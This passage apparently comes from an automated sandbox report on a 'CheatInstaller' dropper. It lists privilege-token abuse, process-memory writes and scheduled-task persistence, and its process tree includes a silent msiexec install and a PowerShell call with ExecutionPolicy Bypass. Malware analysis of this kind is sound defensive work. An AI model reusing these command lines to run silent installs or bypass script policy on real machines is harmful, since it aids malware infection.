N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4376 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe
PID 4376 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe
PID 4376 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe
PID 1224 wrote to memory of 3392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1224 wrote to memory of 3392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1224 wrote to memory of 3392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1540 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1540 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1540 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1224 wrote to memory of 796 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1224 wrote to memory of 796 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1224 wrote to memory of 796 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 796 wrote to memory of 3968 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 796 wrote to memory of 3968 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3968 wrote to memory of 5048 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3968 wrote to memory of 5048 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5048 wrote to memory of 4788 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 4788 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 4788 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1360 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1360 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1360 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1224 wrote to memory of 3672 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1224 wrote to memory of 3672 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1224 wrote to memory of 3672 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5048 wrote to memory of 3120 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3120 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3120 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 2412 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 2412 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 2412 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 4804 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 4804 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 4804 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 4200 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 4200 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 4200 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3476 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3476 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3476 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1056 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1056 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1056 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3132 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3132 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3132 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3312 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3312 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 3312 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 4468 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 4468 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5048 wrote to memory of 4468 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 0B760438556A7DE397489DF12687E02A C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710532431 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 283A16B661ED63194EE759B353549ACC

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss9156.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi9143.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr9144.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr9145.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3370C58241206171484FCCE0EC758105 E Global\MSI0000

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\Installer\MSIAF1C.tmp

